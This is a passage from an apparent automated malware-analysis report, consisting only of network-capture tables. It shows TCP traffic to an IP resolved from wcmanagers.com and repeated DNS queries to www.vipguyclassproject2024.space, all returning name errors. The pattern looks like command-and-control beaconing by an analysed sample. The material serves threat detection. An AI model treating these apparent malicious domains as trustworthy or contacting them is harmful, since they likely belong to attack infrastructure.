                                                                            Jul 3, 2024 08:56:53.483169079 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.483175039 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.483217001 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.483593941 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.483612061 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.483660936 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.483668089 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.483701944 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.484405041 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.484453917 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.484469891 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.484477043 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.484505892 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.484519958 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.485022068 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.485035896 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.485100985 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.485107899 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.485145092 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.542725086 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.542746067 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.542835951 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.542860031 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.542906046 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.544394016 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.544409037 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.544460058 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.544466019 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.544501066 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.572779894 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.572798014 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.572904110 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.572923899 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.572962046 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.573296070 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.573311090 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.573367119 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.573374987 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.573412895 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.573998928 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.574014902 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.574098110 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.574103117 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.574140072 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.574645042 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.574661016 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.574713945 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.574726105 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.574769974 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.574785948 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.574836969 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.574842930 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.574855089 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.574878931 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.574903011 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.578140974 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.578161001 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.578171968 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.578176975 CEST44349700108.170.55.202192.168.2.7

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jul 3, 2024 08:56:51.156667948 CEST5814353192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:56:51.785564899 CEST53581431.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:57:01.053455114 CEST5003653192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:57:01.060977936 CEST53500361.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:57:06.156151056 CEST5335353192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:57:06.166323900 CEST53533531.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:57:11.233755112 CEST6329153192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:57:11.242602110 CEST53632911.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:57:16.274815083 CEST6338853192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:57:16.382141113 CEST53633881.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:57:20.411180973 CEST5034053192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:57:20.418603897 CEST53503401.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:57:25.457830906 CEST5917653192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:57:25.465373039 CEST53591761.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:57:25.560024023 CEST5352309162.159.36.2192.168.2.7
                                                                            Jul 3, 2024 08:57:26.045933962 CEST5058953192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:57:26.060957909 CEST53505891.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:57:28.565835953 CEST4950153192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:57:28.575367928 CEST53495011.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:57:33.639190912 CEST6418353192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:57:33.648858070 CEST53641831.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:57:39.029723883 CEST5594453192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:57:39.037692070 CEST53559441.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:57:43.451848984 CEST5436753192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:57:43.461863041 CEST53543671.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:57:48.607877016 CEST5145653192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:57:48.615583897 CEST53514561.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:57:53.451900005 CEST5917053192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:57:53.468645096 CEST53591701.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:57:58.295365095 CEST4944853192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:57:58.307159901 CEST53494481.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:58:03.311163902 CEST6205253192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:58:03.319127083 CEST53620521.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:58:08.295172930 CEST5718353192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:58:08.302874088 CEST53571831.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:58:13.295453072 CEST4940353192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:58:13.303615093 CEST53494031.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:58:18.295413971 CEST6407353192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:58:18.305335999 CEST53640731.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:58:23.295821905 CEST4957753192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:58:23.307399988 CEST53495771.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:58:28.295320988 CEST5037853192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:58:28.305159092 CEST53503781.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:58:33.332962990 CEST5033653192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:58:33.340440989 CEST53503361.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:58:38.295219898 CEST5520953192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:58:38.306010962 CEST53552091.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:58:43.298301935 CEST5179453192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:58:43.309531927 CEST53517941.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:58:48.295382023 CEST6276953192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:58:48.303158045 CEST53627691.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:58:53.297892094 CEST5514553192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:58:53.306932926 CEST53551451.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:58:58.295571089 CEST6284353192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:58:58.305921078 CEST53628431.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:59:03.295378923 CEST5605653192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:59:03.305491924 CEST53560561.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:59:08.295871973 CEST6154753192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:59:08.303704977 CEST53615471.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:59:13.295552969 CEST5335453192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:59:13.308562040 CEST53533541.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:59:18.304491043 CEST5511753192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:59:18.312145948 CEST53551171.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:59:23.295416117 CEST6384653192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:59:23.303596020 CEST53638461.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:59:28.295485973 CEST5061253192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:59:28.303502083 CEST53506121.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:59:33.295475960 CEST5940253192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:59:33.303508997 CEST53594021.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:59:38.296055079 CEST5447753192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:59:38.303596973 CEST53544771.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:59:43.295725107 CEST5652553192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:59:43.428184032 CEST53565251.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:59:48.295909882 CEST5993253192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:59:48.360872984 CEST53599321.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:59:53.295419931 CEST5477153192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:59:53.302922964 CEST53547711.1.1.1192.168.2.7
                                                                            Jul 3, 2024 08:59:58.331558943 CEST5161653192.168.2.71.1.1.1
                                                                            Jul 3, 2024 08:59:58.342658997 CEST53516161.1.1.1192.168.2.7
                                                                            Jul 3, 2024 09:00:03.295896053 CEST5924053192.168.2.71.1.1.1
                                                                            Jul 3, 2024 09:00:03.304307938 CEST53592401.1.1.1192.168.2.7
                                                                            Jul 3, 2024 09:00:08.295687914 CEST5400353192.168.2.71.1.1.1
                                                                            Jul 3, 2024 09:00:08.303471088 CEST53540031.1.1.1192.168.2.7
                                                                            Jul 3, 2024 09:00:13.298487902 CEST6189553192.168.2.71.1.1.1
                                                                            Jul 3, 2024 09:00:13.306945086 CEST53618951.1.1.1192.168.2.7
                                                                            Jul 3, 2024 09:00:18.295538902 CEST6086853192.168.2.71.1.1.1
                                                                            Jul 3, 2024 09:00:18.303373098 CEST53608681.1.1.1192.168.2.7
                                                                            Jul 3, 2024 09:00:23.295883894 CEST5624553192.168.2.71.1.1.1
                                                                            Jul 3, 2024 09:00:23.583026886 CEST53562451.1.1.1192.168.2.7
                                                                            Jul 3, 2024 09:00:28.295654058 CEST5465553192.168.2.71.1.1.1
                                                                            Jul 3, 2024 09:00:28.304403067 CEST53546551.1.1.1192.168.2.7
                                                                            Jul 3, 2024 09:00:33.321141005 CEST5458553192.168.2.71.1.1.1
                                                                            Jul 3, 2024 09:00:33.329210043 CEST53545851.1.1.1192.168.2.7
                                                                            Jul 3, 2024 09:00:38.295638084 CEST5916453192.168.2.71.1.1.1
                                                                            Jul 3, 2024 09:00:38.303339958 CEST53591641.1.1.1192.168.2.7
                                                                            Jul 3, 2024 09:00:43.295831919 CEST5707553192.168.2.71.1.1.1
                                                                            Jul 3, 2024 09:00:43.304078102 CEST53570751.1.1.1192.168.2.7
                                                                            Jul 3, 2024 09:00:48.295692921 CEST5553053192.168.2.71.1.1.1
                                                                            Jul 3, 2024 09:00:48.305927038 CEST53555301.1.1.1192.168.2.7
                                                                            Jul 3, 2024 09:00:53.295603037 CEST5776653192.168.2.71.1.1.1
                                                                            Jul 3, 2024 09:00:53.303270102 CEST53577661.1.1.1192.168.2.7
                                                                            Jul 3, 2024 09:00:59.882762909 CEST5211853192.168.2.71.1.1.1
                                                                            Jul 3, 2024 09:00:59.892136097 CEST53521181.1.1.1192.168.2.7

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Jul 3, 2024 08:56:51.156667948 CEST192.168.2.71.1.1.10xae16Standard query (0)wcmanagers.comA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:57:01.053455114 CEST192.168.2.71.1.1.10xabbaStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:57:06.156151056 CEST192.168.2.71.1.1.10x42e3Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:57:11.233755112 CEST192.168.2.71.1.1.10x68b0Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:57:16.274815083 CEST192.168.2.71.1.1.10x4ec4Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:57:20.411180973 CEST192.168.2.71.1.1.10xf0b1Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:57:25.457830906 CEST192.168.2.71.1.1.10x7776Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:57:26.045933962 CEST192.168.2.71.1.1.10xbf28Standard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                            Jul 3, 2024 08:57:28.565835953 CEST192.168.2.71.1.1.10x1c0dStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:57:33.639190912 CEST192.168.2.71.1.1.10x4647Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:57:39.029723883 CEST192.168.2.71.1.1.10x5004Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:57:43.451848984 CEST192.168.2.71.1.1.10xda81Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:57:48.607877016 CEST192.168.2.71.1.1.10x3f27Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:57:53.451900005 CEST192.168.2.71.1.1.10xb1deStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:57:58.295365095 CEST192.168.2.71.1.1.10x6185Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:58:03.311163902 CEST192.168.2.71.1.1.10xb730Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:58:08.295172930 CEST192.168.2.71.1.1.10x22ffStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:58:13.295453072 CEST192.168.2.71.1.1.10xcc09Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:58:18.295413971 CEST192.168.2.71.1.1.10x9f10Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:58:23.295821905 CEST192.168.2.71.1.1.10x24e8Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:58:28.295320988 CEST192.168.2.71.1.1.10x4004Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:58:33.332962990 CEST192.168.2.71.1.1.10x7c0Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:58:38.295219898 CEST192.168.2.71.1.1.10x8e2Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:58:43.298301935 CEST192.168.2.71.1.1.10xa794Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:58:48.295382023 CEST192.168.2.71.1.1.10xaccbStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:58:53.297892094 CEST192.168.2.71.1.1.10x330eStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:58:58.295571089 CEST192.168.2.71.1.1.10x7769Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:59:03.295378923 CEST192.168.2.71.1.1.10xcd82Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:59:08.295871973 CEST192.168.2.71.1.1.10xe0deStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:59:13.295552969 CEST192.168.2.71.1.1.10xfdecStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:59:18.304491043 CEST192.168.2.71.1.1.10x115dStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:59:23.295416117 CEST192.168.2.71.1.1.10x9b22Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:59:28.295485973 CEST192.168.2.71.1.1.10xffecStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:59:33.295475960 CEST192.168.2.71.1.1.10xbefStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:59:38.296055079 CEST192.168.2.71.1.1.10x77b5Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:59:43.295725107 CEST192.168.2.71.1.1.10x30c8Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:59:48.295909882 CEST192.168.2.71.1.1.10xcf8aStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:59:53.295419931 CEST192.168.2.71.1.1.10x650Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:59:58.331558943 CEST192.168.2.71.1.1.10xf35eStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 09:00:03.295896053 CEST192.168.2.71.1.1.10xd7ecStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 09:00:08.295687914 CEST192.168.2.71.1.1.10xe10Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 09:00:13.298487902 CEST192.168.2.71.1.1.10x6cbStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 09:00:18.295538902 CEST192.168.2.71.1.1.10x1ce0Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 09:00:23.295883894 CEST192.168.2.71.1.1.10x3ba0Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 09:00:28.295654058 CEST192.168.2.71.1.1.10xda09Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 09:00:33.321141005 CEST192.168.2.71.1.1.10x2f0dStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 09:00:38.295638084 CEST192.168.2.71.1.1.10x4bebStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 09:00:43.295831919 CEST192.168.2.71.1.1.10xedb4Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 09:00:48.295692921 CEST192.168.2.71.1.1.10x7473Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 09:00:53.295603037 CEST192.168.2.71.1.1.10x2869Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 09:00:59.882762909 CEST192.168.2.71.1.1.10x30e6Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Jul 3, 2024 08:56:51.785564899 CEST1.1.1.1192.168.2.70xae16No error (0)wcmanagers.com108.170.55.202A (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:57:01.060977936 CEST1.1.1.1192.168.2.70xabbaName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:57:06.166323900 CEST1.1.1.1192.168.2.70x42e3Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:57:11.242602110 CEST1.1.1.1192.168.2.70x68b0Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:57:16.382141113 CEST1.1.1.1192.168.2.70x4ec4Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:57:20.418603897 CEST1.1.1.1192.168.2.70xf0b1Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:57:25.465373039 CEST1.1.1.1192.168.2.70x7776Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:57:26.060957909 CEST1.1.1.1192.168.2.70xbf28Name error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                            Jul 3, 2024 08:57:28.575367928 CEST1.1.1.1192.168.2.70x1c0dName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:57:33.648858070 CEST1.1.1.1192.168.2.70x4647Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:57:39.037692070 CEST1.1.1.1192.168.2.70x5004Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:57:43.461863041 CEST1.1.1.1192.168.2.70xda81Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:57:48.615583897 CEST1.1.1.1192.168.2.70x3f27Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:57:53.468645096 CEST1.1.1.1192.168.2.70xb1deName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:57:58.307159901 CEST1.1.1.1192.168.2.70x6185Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:58:03.319127083 CEST1.1.1.1192.168.2.70xb730Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:58:08.302874088 CEST1.1.1.1192.168.2.70x22ffName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:58:13.303615093 CEST1.1.1.1192.168.2.70xcc09Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:58:18.305335999 CEST1.1.1.1192.168.2.70x9f10Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:58:23.307399988 CEST1.1.1.1192.168.2.70x24e8Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:58:28.305159092 CEST1.1.1.1192.168.2.70x4004Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:58:33.340440989 CEST1.1.1.1192.168.2.70x7c0Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:58:38.306010962 CEST1.1.1.1192.168.2.70x8e2Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:58:43.309531927 CEST1.1.1.1192.168.2.70xa794Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:58:48.303158045 CEST1.1.1.1192.168.2.70xaccbName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:58:53.306932926 CEST1.1.1.1192.168.2.70x330eName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:58:58.305921078 CEST1.1.1.1192.168.2.70x7769Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:59:03.305491924 CEST1.1.1.1192.168.2.70xcd82Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:59:08.303704977 CEST1.1.1.1192.168.2.70xe0deName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:59:13.308562040 CEST1.1.1.1192.168.2.70xfdecName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:59:18.312145948 CEST1.1.1.1192.168.2.70x115dName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:59:23.303596020 CEST1.1.1.1192.168.2.70x9b22Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:59:28.303502083 CEST1.1.1.1192.168.2.70xffecName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:59:33.303508997 CEST1.1.1.1192.168.2.70xbefName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:59:38.303596973 CEST1.1.1.1192.168.2.70x77b5Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:59:43.428184032 CEST1.1.1.1192.168.2.70x30c8Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
